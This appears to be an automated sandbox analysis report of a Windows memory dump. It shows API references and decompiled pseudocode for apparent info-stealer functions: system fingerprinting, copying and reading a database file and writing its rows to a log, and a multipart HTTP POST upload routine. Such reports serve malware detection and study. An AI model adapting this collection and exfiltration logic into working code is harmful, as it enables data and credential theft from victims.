Part of subcall function 0041B260: RegCloseKey.ADVAPI32(?), ref: 0041B2BF

_fprintf.LIBCMT ref: 0041FC8B
_fprintf.LIBCMT ref: 0041FC9C

Part of subcall function 0041B220: GetCurrentProcess.KERNEL32(00000000), ref: 0041B22F
Part of subcall function 0041B220: IsWow64Process.KERNEL32(00000000), ref: 0041B236

_fprintf.LIBCMT ref: 0041FCB5
_fprintf.LIBCMT ref: 0041FCC6

Part of subcall function 0041B1E0: GetUserNameA.ADVAPI32(?,00000104), ref: 0041B205

_fprintf.LIBCMT ref: 0041FCDF
_fprintf.LIBCMT ref: 0041FCF0

Part of subcall function 0041B2E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041B30B

_fprintf.LIBCMT ref: 0041FD09
_fprintf.LIBCMT ref: 0041FD1A

Part of subcall function 0041ABD0: _memset.LIBCMT ref: 0041ABFA
Part of subcall function 0041ABD0: GetUserDefaultLocaleName.KERNEL32(?,00000055), ref: 0041AC0B

_fprintf.LIBCMT ref: 0041FD33
_fprintf.LIBCMT ref: 0041FD44

Part of subcall function 0041B0E0: RegOpenKeyExA.KERNEL32(80000002,00C17080,00000000,00020119,?), ref: 0041B111
Part of subcall function 0041B0E0: RegQueryValueExA.KERNEL32(?,00C16B18,00000000,00000000,?,000000FF), ref: 0041B135
Part of subcall function 0041B0E0: RegCloseKey.ADVAPI32(?), ref: 0041B13F

_fprintf.LIBCMT ref: 0041FD5D
_fprintf.LIBCMT ref: 0041FD6E

Part of subcall function 0041B160: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041B17A
Part of subcall function 0041B160: GetProcessHeap.KERNEL32(00000000,00000064), ref: 0041B188
Part of subcall function 0041B160: HeapAlloc.KERNEL32(00000000), ref: 0041B18F
Part of subcall function 0041B160: lstrcat.KERNEL32(?,?), ref: 0041B1B3

_fprintf.LIBCMT ref: 0041FD87
_fprintf.LIBCMT ref: 0041FD98

Part of subcall function 0041B570: DsRoleGetPrimaryDomainInformation.NETAPI32(00000000,00000001,?), ref: 0041B584

_fprintf.LIBCMT ref: 0041FDB1
_fprintf.LIBCMT ref: 0041FDC2

Part of subcall function 0041B500: NetWkstaGetInfo.NETAPI32(00000000,00000064,00000000), ref: 0041B527

_fprintf.LIBCMT ref: 0041FDDB
_fprintf.LIBCMT ref: 0041FDEC

Part of subcall function 0041AA60: GetProcessHeap.KERNEL32(00000000,000001F4), ref: 0041AA7A
Part of subcall function 0041AA60: HeapAlloc.KERNEL32(00000000), ref: 0041AA81
Part of subcall function 0041AA60: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 0041AAA2
Part of subcall function 0041AA60: LocalAlloc.KERNEL32(00000040,?), ref: 0041AABA
Part of subcall function 0041AA60: GetKeyboardLayoutList.USER32(?,00000000), ref: 0041AACE
Part of subcall function 0041AA60: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041AB23
Part of subcall function 0041AA60: wsprintfA.USER32 ref: 0041AB4C
Part of subcall function 0041AA60: wsprintfA.USER32 ref: 0041AB6A
Part of subcall function 0041AA60: _memset.LIBCMT ref: 0041AB90
Part of subcall function 0041AA60: LocalFree.KERNEL32(00000000), ref: 0041ABA7

_fprintf.LIBCMT ref: 0041FE05
_fprintf.LIBCMT ref: 0041FE16
_fprintf.LIBCMT ref: 0041FE29
_fprintf.LIBCMT ref: 0041FE3A

Part of subcall function 0041B460: RegOpenKeyExA.KERNEL32(80000002,00C17008,00000000,00020119,?), ref: 0041B491
Part of subcall function 0041B460: RegQueryValueExA.KERNEL32(?,00C16290,00000000,00000000,?,000000FF), ref: 0041B4B5
Part of subcall function 0041B460: RegCloseKey.ADVAPI32(?), ref: 0041B4BF

_fprintf.LIBCMT ref: 0041FE53
_fprintf.LIBCMT ref: 0041FE64

Part of subcall function 0041B4E0: GetSystemInfo.KERNEL32(?), ref: 0041B4EA

_fprintf.LIBCMT ref: 0041FE7D
_fprintf.LIBCMT ref: 0041FE8E

Part of subcall function 0041B090: EnumDisplayDevicesA.USER32(00000000,00000000,000001A8,00000001), ref: 0041B0BA

_fprintf.LIBCMT ref: 0041FEA7
_fprintf.LIBCMT ref: 0041FEB8

Part of subcall function 0041AF50: CreateDCA.GDI32(00C167F8,00000000,00000000,00000000), ref: 0041AF6F
Part of subcall function 0041AF50: GetDeviceCaps.GDI32(?,00000008), ref: 0041AF7E
Part of subcall function 0041AF50: GetDeviceCaps.GDI32(?,0000000A), ref: 0041AF8D
Part of subcall function 0041AF50: ReleaseDC.USER32(00000000,?), ref: 0041AF9C
Part of subcall function 0041AF50: wsprintfA.USER32 ref: 0041AFB7

_fprintf.LIBCMT ref: 0041FED1
_fprintf.LIBCMT ref: 0041FEE2

Part of subcall function 0041B340: LoadLibraryA.KERNEL32(00C16920,00C182C0), ref: 0041B360
Part of subcall function 0041B340: GetProcAddress.KERNEL32(00000000), ref: 0041B367
Part of subcall function 0041B340: _memset.LIBCMT ref: 0041B381
Part of subcall function 0041B340: GlobalMemoryStatusEx.KERNEL32(00000040), ref: 0041B39A
Part of subcall function 0041B340: __aulldiv.LIBCMT ref: 0041B3B7
Part of subcall function 0041B340: GlobalMemoryStatus.KERNEL32 ref: 0041B414
Part of subcall function 0041B340: wsprintfA.USER32 ref: 0041B43E

_fprintf.LIBCMT ref: 0041FEFB
_fprintf.LIBCMT ref: 0041FF0C

Part of subcall function 0041AC40: GetSystemPowerStatus.KERNEL32(?), ref: 0041AC54

_fprintf.LIBCMT ref: 0041FF25
_fprintf.LIBCMT ref: 0041FF36
_fprintf.LIBCMT ref: 0041FF49
_fprintf.LIBCMT ref: 0041FF5A

Part of subcall function 0041B610: wsprintfA.USER32 ref: 0041B691

_fprintf.LIBCMT ref: 0041FF78
_fprintf.LIBCMT ref: 0041FF89

Part of subcall function 0041AFE0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 0041AFFA
Part of subcall function 0041AFE0: HeapAlloc.KERNEL32(00000000), ref: 0041B001
Part of subcall function 0041AFE0: _memset.LIBCMT ref: 0041B025
Part of subcall function 0041AFE0: GetTimeZoneInformation.KERNEL32(00000000), ref: 0041B034

_fprintf.LIBCMT ref: 0041FFA2
_fprintf.LIBCMT ref: 0041FFB3
_fprintf.LIBCMT ref: 0041FFC6
_fprintf.LIBCMT ref: 0041FFD7
_fprintf.LIBCMT ref: 0041FFEA
_fprintf.LIBCMT ref: 0041FFFB
_fprintf.LIBCMT ref: 0042000E
_fprintf.LIBCMT ref: 0042001F
_fprintf.LIBCMT ref: 00420032
_fprintf.LIBCMT ref: 00420043

Part of subcall function 0041AC90: _memset.LIBCMT ref: 0041ACB5
Part of subcall function 0041AC90: RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020019,00000000), ref: 0041AD12

_fprintf.LIBCMT ref: 00420055

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _fprintf$Heap$Process_memsetwsprintf$AllocOpen$CloseInfoNameQueryStatusValue$CapsCurrentDeviceGlobalInformationKeyboardLayoutListLocalLocaleMemorySystemUser$AddressComputerCreateDefaultDevicesDisplayDomainEnumFreeLibraryLoadPowerPrimaryProcProfileReleaseRoleTimeWkstaWow64Zone__aulldiv__fsopen__ftbuf__lock_file__output_l__stbuflstrcat
String ID:
API String ID: 3815832867-0
Opcode ID: 1f2ccc3f07caff849bd25012e1026c9cf6fe3874ff363e293360ae0c0acfb85e
Instruction ID: 9cc9c928b3973a5d02f723f5dd61f81d53029beb8fdb6c463f12c4216c2d1ea9
Opcode Fuzzy Hash: 1f2ccc3f07caff849bd25012e1026c9cf6fe3874ff363e293360ae0c0acfb85e
Instruction Fuzzy Hash: 11B162BAF20604BBC604FBE5ED42D4F77B99F68304F104469B509B3285E53DEB109BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00422460, Relevance: 40.6, APIs: 17, Strings: 6, Instructions: 306
networkCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00422460(void* __ebx, void** __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char* _v8;
				char _v16;
				signed int _v20;
				signed int _v24;
				char _v52;
				char _v80;
				void* _v84;
				intOrPtr _v88;
				void _v92;
				void* _v96;
				void* _v100;
				char _v128;
				int _v132;
				char _v184;
				long _v188;
				void _v456;
				char* _v460;
				void* _v464;
				long _v468;
				char* _v472;
				void** _v476;
				signed int _t128;
				signed int _t129;
				void* _t147;
				long _t150;
				void* _t158;
				void* _t164;
				long _t169;
				long _t177;
				int _t182;
				void* _t199;
				void* _t271;
				void* _t272;
				signed int _t273;
				void* _t274;
				void* _t275;
				void* _t281;

				_t272 = __esi;
				_t271 = __edi;
				_t199 = __ebx;
				_push(0xffffffff);
				_push(E004266A4);
				_push( *[fs:0x0]);
				_t275 = _t274 - 0x1cc;
				_t128 =  *0x4301f4; // 0x3b2bc12f
				_t129 = _t128 ^ _t273;
				_v24 = _t129;
				_push(_t129);
				 *[fs:0x0] =  &_v16;
				_v476 = __ecx;
				_t131 = _v476;
				_v476[0xd] = 0;
				if(_v476[0xb] != 0) {
					_v464 = _v476[0xb];
					_push(_v464);
					_t131 = E00405122();
					_t275 = _t275 + 4;
					_v476[0xb] = 0;
				}
				E00421740(_t131, _v476, "--");
				E00421740(E00421740( &(_v476[4]), _v476,  &(_v476[4])), _v476, "--\r\n");
				E004011C0( &_v52, _a4);
				_v8 = 0;
				_v88 = E00401EE0( &_v52, "http://", 0);
				_t281 = _v88 -  *0x42d8c4; // 0xffffffff
				if(_t281 != 0) {
					E00401B90( &_v52, _v88, 7);
				}
				_v88 = E00401370( &_v52, 0x2f, 0);
				E00401F30( &_v52,  &_v80, 0, _v88);
				_v8 = 1;
				E00401B90( &_v52, 0, _v88);
				E00401E10( &(_v476[0x11]), 0x104, _a4, 0x103);
				_v20 = 0;
				if(_v476[0xe] != 0) {
					_v20 = _v20 | 0x00000003;
				}
				_t257 = _v476;
				_t147 = InternetOpenA(_v476[3], _v20, _v476[0xe], 0, 0); // executed
				_v84 = _t147;
				if(_v84 != 0) {
					_v92 = 1;
					InternetSetOptionA(_v84, 0x41,  &_v92, 4);
					_t257 = _v476;
					_t158 = InternetConnectA(_v84, E00401330( &_v80), 0x50, _v476[0xf], _v476[0x10], 3, 0, 1); // executed
					_v96 = _t158;
					if(_v96 != 0) {
						InternetSetOptionA(_v96, 0x41, 1, 0);
						_t164 = HttpOpenRequestA(_v96, "POST", E00401330( &_v52), 0, 0, 0, 0x400000, 1); // executed
						_v100 = _t164;
						if(_v100 != 0) {
							E004217A0(_t199, _v476, _t271, _t272, _v100);
							E004011C0( &_v128, "Content-Type: multipart/form-data; boundary=");
							_v8 = 2;
							E00401EC0( &_v128,  &(_v476[4]));
							_t169 = E00401350( &_v128);
							HttpAddRequestHeadersA(_v100, E00401330( &_v128), _t169, 0x20000000);
							E00404F9A(_v476[2],  &_v184, 0x32, 0xa);
							E00401EA0( &_v128, "Content-Length: ");
							E00401EC0( &_v128,  &_v184);
							_t177 = E00401350( &_v128);
							HttpAddRequestHeadersA(_v100, E00401330( &_v128), _t177, 0x20000000);
							_t182 = HttpSendRequestA(_v100, 0, 0,  *_v476, _v476[2]); // executed
							_v132 = _t182;
							if(_v132 != 0) {
								_v188 = 0x104;
								if(HttpQueryInfoA(_v100, 0x2e,  &_v456,  &_v188, 0) != 0) {
									InternetCloseHandle(_v100);
									 *((char*)(_t273 + _v188 - 0x1c4)) = 0;
									_v460 = E00401E50( &_v456, "http");
									E00401E10( &(_v476[0x11]), 0x104, _v460, 0x103);
									_v100 = InternetOpenUrlA(_v84, _v460, 0, 0, 0x400000, 0);
								}
								if(_v100 != 0) {
									E00421CF0(_t199, _v476, _t271, _t272, _v100); // executed
								}
							}
							InternetCloseHandle(_v100); // executed
							_v8 = 1;
							E004012D0( &_v128);
						}
						_t257 = _v96;
						InternetCloseHandle(_v96);
					}
					InternetCloseHandle(_v84);
				}
				if(_v476[0xd] <= 0) {
					_v472 = 0;
					_v8 = 0;
					E004012D0( &_v80);
					_v8 = 0xffffffff;
					E004012D0( &_v52);
					_t150 = _v472;
				} else {
					_v468 = 1;
					_v8 = 0;
					E004012D0( &_v80);
					_v8 = 0xffffffff;
					E004012D0( &_v52);
					_t150 = _v468;
				}
				 *[fs:0x0] = _v16;
				return E00404354(_t150, _t199, _v24 ^ _t273, _t257, _t271, _t272);
			}

0x00422460
0x00422460
0x00422460
0x00422463
0x00422465
0x00422470
0x00422471
0x00422477
0x0042247c
0x0042247e
0x00422481
0x00422485
0x0042248b
0x00422491
0x00422497
0x004224a8
0x004224b3
0x004224bf
0x004224c0
0x004224c5
0x004224ce
0x004224ce
0x004224e0
0x00422505
0x00422511
0x00422516
0x0042252c
0x00422532
0x00422538
0x00422543
0x00422543
0x00422554
0x00422564
0x00422569
0x00422576
0x00422593
0x0042259b
0x004225ac
0x004225b4
0x004225b4
0x004225c9
0x004225d3
0x004225d9
0x004225e0
0x004225e6
0x004225f9
0x0042260f
0x00422628
0x0042262e
0x00422635
0x00422645
0x0042266a
0x00422670
0x00422677
0x00422687
0x00422694
0x00422699
0x004226aa
0x004226b7
0x004226ca
0x004226e5
0x004226f5
0x00422704
0x00422711
0x00422724
0x00422745
0x0042274b
0x00422752
0x00422758
0x00422780
0x00422786
0x00422792
0x004227ae
0x004227cf
0x004227f3
0x004227f3
0x004227fa
0x00422806
0x00422806
0x004227fa
0x0042280f
0x00422815
0x0042281c
0x0042281c
0x00422821
0x00422825
0x00422825
0x0042282f
0x0042282f
0x0042283f
0x00422870
0x0042287a
0x00422881
0x00422886
0x00422890
0x00422895
0x00422841
0x00422841
0x0042284b
0x00422852
0x00422857
0x00422861
0x00422866
0x00422866
0x004228bb
0x004228d0

APIs

__mbstowcs_l.LIBCMTD ref: 00422593
InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 004225D3
InternetSetOptionA.WININET(00000000,00000041,00000001,00000004), ref: 004225F9
InternetConnectA.WININET(00000000,00000000,00000050,?,?,00000003,00000000,00000001), ref: 00422628
InternetSetOptionA.WININET(00000000,00000041,00000001,00000000), ref: 00422645
HttpOpenRequestA.WININET(00000000,POST,00000000,00000000,00000000,00000000,00400000,00000001), ref: 0042266A
InternetCloseHandle.WININET(00000000), ref: 00422825

Part of subcall function 004217A0: HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,20000000), ref: 004217FA
Part of subcall function 004217A0: HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,20000000), ref: 00421828
Part of subcall function 004217A0: HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,20000000), ref: 00421856
Part of subcall function 004217A0: HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,20000000), ref: 00421884

HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,20000000), ref: 004226CA
__itow_s.LIBCMT ref: 004226E5

Part of subcall function 00404F9A: _xtoa_s@20.LIBCMT ref: 00404FBD

HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,20000000), ref: 00422724
HttpSendRequestA.WININET(00000000,00000000,00000000,?,?), ref: 00422745
HttpQueryInfoA.WININET(00000000,0000002E,?,00000104,00000000), ref: 00422778
InternetCloseHandle.WININET(00000000), ref: 00422786
__mbstowcs_l.LIBCMTD ref: 004227CF

Part of subcall function 00401E10: __cftof.LIBCMT ref: 00401E23

InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00400000,00000000), ref: 004227ED
InternetCloseHandle.WININET(00000000), ref: 0042280F
InternetCloseHandle.WININET(00000000), ref: 0042282F

Strings

--, xrefs: 004224FA
POST, xrefs: 00422661
Content-Type: multipart/form-data; boundary=, xrefs: 0042268C
http://, xrefs: 0042251F
http, xrefs: 0042279A
Content-Length: , xrefs: 004226ED

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: HttpInternet$Request$Headers$CloseHandle$Open$Option__mbstowcs_l$ConnectInfoQuerySend__cftof__itow_s_xtoa_s@20
String ID: --$Content-Length: $Content-Type: multipart/form-data; boundary=$POST$http$http://
API String ID: 463163979-1095625359
Opcode ID: 6ef930aceb50f50c88dad62f9af03b6e3da15786f337afd65bc5808adaf03fda
Instruction ID: faf664677b1087e991e18eee5182954285e9de6bbfcc660a5bad21f60391df42
Opcode Fuzzy Hash: 6ef930aceb50f50c88dad62f9af03b6e3da15786f337afd65bc5808adaf03fda
Instruction Fuzzy Hash: D4D13C70A00218ABDB14EB94DC95FEEB375BB44704F5041AAF505BB2D1DBB8AE84CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041E0E0, Relevance: 36.4, APIs: 24, Instructions: 367
filestringCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E0041E0E0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, CHAR* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v8;
				char _v16;
				signed int _v20;
				char _v48;
				char _v76;
				char _v80;
				intOrPtr _v84;
				char _v88;
				char _v352;
				intOrPtr _v356;
				intOrPtr* _v360;
				intOrPtr _v364;
				char _v392;
				intOrPtr* _v396;
				intOrPtr* _v400;
				char _v401;
				char _v402;
				intOrPtr _v408;
				intOrPtr _v412;
				intOrPtr* _v416;
				intOrPtr* _v420;
				char _v421;
				char _v422;
				intOrPtr _v428;
				intOrPtr _v432;
				intOrPtr _v436;
				intOrPtr _v440;
				void* __ebp;
				signed int _t123;
				signed int _t124;
				void* _t132;
				int _t133;
				void* _t136;
				intOrPtr _t140;
				intOrPtr _t141;
				void* _t142;
				void* _t148;
				intOrPtr* _t152;
				intOrPtr _t153;
				intOrPtr _t163;
				void* _t167;
				intOrPtr* _t177;
				intOrPtr _t178;
				intOrPtr _t188;
				void* _t192;
				void* _t201;
				intOrPtr _t202;
				char _t215;
				intOrPtr _t218;
				char _t228;
				intOrPtr _t231;
				char _t240;
				char _t241;
				intOrPtr _t243;
				intOrPtr _t246;
				intOrPtr _t255;
				intOrPtr _t259;
				intOrPtr _t265;
				intOrPtr _t269;
				void* _t272;
				void* _t273;
				signed int _t274;
				void* _t275;
				void* _t277;
				void* _t278;
				void* _t281;

				_t273 = __esi;
				_t272 = __edi;
				_t201 = __ebx;
				_t123 =  *0x4301f4; // 0x3b2bc12f
				_t124 = _t123 ^ _t274;
				_v20 = _t124;
				 *[fs:0x0] =  &_v16;
				GetCurrentDirectoryA(0x104,  &_v352);
				_t202 =  *0x432400; // 0xc16718
				 *0x4328c4( &_v352, _t202, _t124,  *[fs:0x0], E004265BC, 0xffffffff);
				CopyFileA(_a8,  &_v352, 1);
				_t243 =  *0x432158; // 0xc16d08
				_v84 = _t243;
				_t132 =  *0x432750( &_v352,  &_v80); // executed
				_t277 = _t275 - 0x1a8 + 8;
				if(_t132 == 0) {
					_t136 =  *0x432700(_v80, _v84, 0xffffffff,  &_v88, 0);
					_t278 = _t277 + 0x14;
					if(_t136 == 0) {
						_t246 =  *0x432188; // 0xc16828
						_t140 =  *0x4325d0; // 0xc16c20
						_t141 = E004055AB(_t140, _t246); // executed
						_t278 = _t278 + 8;
						_v356 = _t141;
						if(_v356 != 0) {
							while(1) {
								L3:
								_t142 =  *0x432720(_v88);
								_t281 = _t278 + 4;
								if(_t142 != 0x64) {
									break;
								}
								_v364 =  *0x43273c(_v88, 0);
								_v360 =  *0x43273c(_v88, 1);
								_t148 =  *0x43272c(_v88, 2, _a16, _a20);
								E0041D730(_t201,  &_v392,  *0x432734(), _v88, 2, _t148);
								_t278 = _t281 + 0x34;
								_v8 = 0;
								_v396 = 0x42942e;
								_v400 = E00401330( &_v392);
								while(1) {
									_t152 = _v400;
									_t215 =  *_t152;
									_v401 = _t215;
									if(_t215 !=  *_v396) {
										break;
									}
									if(_v401 == 0) {
										L9:
										_v408 = 0;
									} else {
										_t152 = _v400;
										_t241 =  *((intOrPtr*)(_t152 + 1));
										_v402 = _t241;
										_t37 = _v396 + 1; // 0x69620a00
										if(_t241 !=  *_t37) {
											break;
										} else {
											_v400 = _v400 + 2;
											_v396 = _v396 + 2;
											if(_v402 != 0) {
												continue;
											} else {
												goto L9;
											}
										}
									}
									L11:
									_v412 = _v408;
									if(_v412 != 0) {
										_t153 =  *0x43239c; // 0xc16ba8
										E004055C2(_t201, _t272, _t273, __eflags);
										E004055C2(_t201, _t272, _t273, __eflags);
										_t218 =  *0x4323b8; // 0xc16c38
										E004055C2(_t201, _t272, _t273, __eflags);
										E004055C2(_t201, _t272, _t273, __eflags);
										_t255 =  *0x432258; // 0xc16bd8
										E004055C2(_t201, _t272, _t273, __eflags);
										E004055C2(_t201, _t272, _t273, __eflags);
										_t163 =  *0x4322b4; // 0xc168d8
										E004055C2(_t201, _t272, _t273, __eflags);
										E004055C2(_t201, _t272, _t273, __eflags);
										_t167 =  *0x43272c(_v88, 2, _a16, _a20, _v356, "\n", _v356, _t163, _v360, _v356, "\n", _v356, _t255, _v364, _v356, "\n", _v356, _t218, _a12, _v356, "\n", _v356, _t153, _a4);
										_v440 = E0041D730(_t201,  &_v76,  *0x432734(), _v88, 2, _t167);
										_push(E00401330(_v440));
										_t259 =  *0x4326c4; // 0xc16aa0
										_push(_t259);
										_push(_v356);
										E004055C2(_t201, _t272, _t273, __eflags);
										E004012D0( &_v76);
										_push("\n\n");
										_push(_v356);
										E004055C2(_t201, _t272, _t273, __eflags);
										_t278 = _t278 + 0x88;
									} else {
										_v416 = 0x42942f;
										_v420 = _v360;
										while(1) {
											_t177 = _v420;
											_t228 =  *_t177;
											_v421 = _t228;
											if(_t228 !=  *_v416) {
												break;
											}
											if(_v421 == 0) {
												L17:
												_v428 = 0;
											} else {
												_t177 = _v420;
												_t240 =  *((intOrPtr*)(_t177 + 1));
												_v422 = _t240;
												_t59 = _v416 + 1; // 0x7469620a
												if(_t240 !=  *_t59) {
													break;
												} else {
													_v420 = _v420 + 2;
													_v416 = _v416 + 2;
													if(_v422 != 0) {
														continue;
													} else {
														goto L17;
													}
												}
											}
											L19:
											_v432 = _v428;
											if(_v432 != 0) {
												_t178 =  *0x43239c; // 0xc16ba8
												E004055C2(_t201, _t272, _t273, __eflags);
												E004055C2(_t201, _t272, _t273, __eflags);
												_t231 =  *0x4323b8; // 0xc16c38
												E004055C2(_t201, _t272, _t273, __eflags);
												E004055C2(_t201, _t272, _t273, __eflags);
												_t265 =  *0x432258; // 0xc16bd8
												E004055C2(_t201, _t272, _t273, __eflags);
												E004055C2(_t201, _t272, _t273, __eflags);
												_t188 =  *0x4322b4; // 0xc168d8
												E004055C2(_t201, _t272, _t273, __eflags);
												E004055C2(_t201, _t272, _t273, __eflags);
												_t192 =  *0x43272c(_v88, 2, _a16, _a20, _v356, "\n", _v356, _t188, _v360, _v356, "\n", _v356, _t265, _v364, _v356, "\n", _v356, _t231, _a12, _v356, "\n", _v356, _t178, _a4);
												_v436 = E0041D730(_t201,  &_v48,  *0x432734(), _v88, 2, _t192);
												_push(E00401330(_v436));
												_t269 =  *0x4326c4; // 0xc16aa0
												_push(_t269);
												_push(_v356);
												E004055C2(_t201, _t272, _t273, __eflags);
												E004012D0( &_v48);
												_push("\n\n");
												_push(_v356);
												E004055C2(_t201, _t272, _t273, __eflags);
												_t278 = _t278 + 0x88;
											}
											goto L24;
										}
										asm("sbb eax, eax");
										asm("sbb eax, 0xffffffff");
										_v428 = _t177;
										goto L19;
									}
									L24:
									_v8 = 0xffffffff;
									E004012D0( &_v392);
									goto L3;
								}
								asm("sbb eax, eax");
								asm("sbb eax, 0xffffffff");
								_v408 = _t152;
								goto L11;
							}
							_push(_v356);
							E00405EA3(_t201, _v356, _t272, _t273, __eflags);
							_t278 = _t281 + 4;
						}
					}
					 *0x432724(_v88);
					 *0x432754(_v80);
				}
				_t133 = DeleteFileA( &_v352); // executed
				 *[fs:0x0] = _v16;
				__eflags = _v20 ^ _t274;
				return E00404354(_t133, _t201, _v20 ^ _t274,  &_v352, _t272, _t273);
			}

0x0041e0e0
0x0041e0e0
0x0041e0e0
0x0041e0f7
0x0041e0fc
0x0041e0fe
0x0041e105
0x0041e117
0x0041e11d
0x0041e12b
0x0041e13e
0x0041e144
0x0041e14a
0x0041e158
0x0041e15e
0x0041e163
0x0041e179
0x0041e17f
0x0041e184
0x0041e18a
0x0041e191
0x0041e197
0x0041e19c
0x0041e19f
0x0041e1ac
0x0041e1b2
0x0041e1b2
0x0041e1b6
0x0041e1bc
0x0041e1c2
0x00000000
0x00000000
0x0041e1d7
0x0041e1ec
0x0041e200
0x0041e221
0x0041e226
0x0041e229
0x0041e230
0x0041e245
0x0041e24b
0x0041e24b
0x0041e251
0x0041e253
0x0041e261
0x00000000
0x00000000
0x0041e26a
0x0041e29d
0x0041e29d
0x0041e26c
0x0041e26c
0x0041e272
0x0041e275
0x0041e281
0x0041e284
0x00000000
0x0041e286
0x0041e286
0x0041e28d
0x0041e29b
0x00000000
0x00000000
0x00000000
0x00000000
0x0041e29b
0x0041e284
0x0041e2b4
0x0041e2ba
0x0041e2c7
0x0041e4a3
0x0041e4b0
0x0041e4c4
0x0041e4d0
0x0041e4de
0x0041e4f2
0x0041e501
0x0041e50f
0x0041e523
0x0041e532
0x0041e53f
0x0041e553
0x0041e569
0x0041e58f
0x0041e5a0
0x0041e5a1
0x0041e5a7
0x0041e5ae
0x0041e5af
0x0041e5ba
0x0041e5bf
0x0041e5ca
0x0041e5cb
0x0041e5d0
0x0041e2cd
0x0041e2cd
0x0041e2dd
0x0041e2e3
0x0041e2e3
0x0041e2e9
0x0041e2eb
0x0041e2f9
0x00000000
0x00000000
0x0041e302
0x0041e335
0x0041e335
0x0041e304
0x0041e304
0x0041e30a
0x0041e30d
0x0041e319
0x0041e31c
0x00000000
0x0041e31e
0x0041e31e
0x0041e325
0x0041e333
0x00000000
0x00000000
0x00000000
0x00000000
0x0041e333
0x0041e31c
0x0041e34c
0x0041e352
0x0041e35f
0x0041e36a
0x0041e377
0x0041e38b
0x0041e397
0x0041e3a5
0x0041e3b9
0x0041e3c8
0x0041e3d6
0x0041e3ea
0x0041e3f9
0x0041e406
0x0041e41a
0x0041e430
0x0041e456
0x0041e467
0x0041e468
0x0041e46e
0x0041e475
0x0041e476
0x0041e481
0x0041e486
0x0041e491
0x0041e492
0x0041e497
0x0041e497
0x00000000
0x0041e49a
0x0041e341
0x0041e343
0x0041e346
0x00000000
0x0041e346
0x0041e5d3
0x0041e5d3
0x0041e5e0
0x00000000
0x0041e5e0
0x0041e2a9
0x0041e2ab
0x0041e2ae
0x00000000
0x0041e2ae
0x0041e5f0
0x0041e5f1
0x0041e5f6
0x0041e5f6
0x0041e1ac
0x0041e5fd
0x0041e60a
0x0041e610
0x0041e61a
0x0041e623
0x0041e62e
0x0041e638

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?,3B2BC12F), ref: 0041E117
lstrcat.KERNEL32(?,00C16718), ref: 0041E12B
CopyFileA.KERNEL32(?,?,00000001), ref: 0041E13E
DeleteFileA.KERNEL32(?), ref: 0041E61A

Part of subcall function 004055AB: __fsopen.LIBCMT ref: 004055B8

Part of subcall function 0041D730: _memset.LIBCMT ref: 0041D7A4
Part of subcall function 0041D730: LocalAlloc.KERNEL32(00000040,?), ref: 0041D7F3

_fprintf.LIBCMT ref: 0041E377
_fprintf.LIBCMT ref: 0041E38B
_fprintf.LIBCMT ref: 0041E3A5
_fprintf.LIBCMT ref: 0041E3B9
_fprintf.LIBCMT ref: 0041E3D6
_fprintf.LIBCMT ref: 0041E3EA
_fprintf.LIBCMT ref: 0041E406
_fprintf.LIBCMT ref: 0041E476
_fprintf.LIBCMT ref: 0041E492
_fprintf.LIBCMT ref: 0041E41A

Part of subcall function 004055C2: __lock_file.LIBCMT ref: 00405609
Part of subcall function 004055C2: __stbuf.LIBCMT ref: 0040568D
Part of subcall function 004055C2: __output_l.LIBCMT ref: 0040569D
Part of subcall function 004055C2: __ftbuf.LIBCMT ref: 004056A7

_fprintf.LIBCMT ref: 0041E4B0
_fprintf.LIBCMT ref: 0041E4C4
_fprintf.LIBCMT ref: 0041E4DE
_fprintf.LIBCMT ref: 0041E4F2
_fprintf.LIBCMT ref: 0041E50F
_fprintf.LIBCMT ref: 0041E523
_fprintf.LIBCMT ref: 0041E53F
_fprintf.LIBCMT ref: 0041E553
_fprintf.LIBCMT ref: 0041E5AF
_fprintf.LIBCMT ref: 0041E5CB

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _fprintf$File$AllocCopyCurrentDeleteDirectoryLocal__fsopen__ftbuf__lock_file__output_l__stbuf_memsetlstrcat
String ID:
API String ID: 3148340754-0
Opcode ID: 3e36b04aaf01437d1d0c533f3c43608551969b2149bde5ab757ed3e88d35e922
Instruction ID: b28846bd6424f20ce2a9d3b9ec4ba7a1ca7f8e05558c29a70d2fe02686c8bc3e
Opcode Fuzzy Hash: 3e36b04aaf01437d1d0c533f3c43608551969b2149bde5ab757ed3e88d35e922
Instruction Fuzzy Hash: A1E180B1E00218AFCB14DFA5DD45BDBB7B5BB58300F0481A9F509A7281D7799E84CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004218C0, Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 239
fileCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E004218C0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, CHAR* _a8) {
				struct _OVERLAPPED* _v8;
				char _v16;
				signed int _v20;
				char _v48;
				intOrPtr _v52;
				long _v56;
				char _v84;
				char _v112;
				void* _v116;
				long _v120;
				void* _v124;
				intOrPtr _v128;
